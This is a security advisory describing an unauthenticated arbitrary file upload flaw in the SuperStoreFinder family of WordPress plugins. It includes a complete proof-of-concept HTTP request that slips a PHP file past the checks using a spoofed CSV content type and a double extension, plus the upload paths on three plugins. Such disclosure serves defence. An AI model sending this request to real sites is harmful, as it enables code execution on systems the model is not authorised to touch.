SuperStoreFinder Plugins – Unauthenticated Arbitrary File Upload

Description

The SuperStoreFinder premium WordPress plugins did not properly check file uploads, depending on the plugin, only checking for the mime type and/or the first extension of the file name.

An attacker could set the Content-Type header to "Content-Type: text/csv", as well as use a double extension to bypass the checks in place, allowing arbitrary files to be uploaded.

The original advisory mentioned a Cross-Site Request Forgery (CSRF) vulnerability, however there was no need to use a CSRF attack as the request could be sent as an unauthenticated user.

According to the changelog, it appears that the plugin recently underwent a Penetration Test. It is possible that the patch from the penetration test was reverse engineered to create an exploit and posted to the PacketStorm repository.

Proof of Concept

POST /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------61952268337452675651047936648
Content-Length: 254
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

-----------------------------61952268337452675651047936648
Content-Disposition: form-data; name="default_location"; filename="test.csv.php"
Content-Type: text/csv

<?php
echo 'It Works';
?>

-----------------------------61952268337452675651047936648--


Then open http://localhost/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/test.csv.php

Other plugin's paths:
- /superlogoshowcase-wp/sls-wp-admin/pages/import.php
- /super-interactive-maps/sim-wp-admin/pages/import.php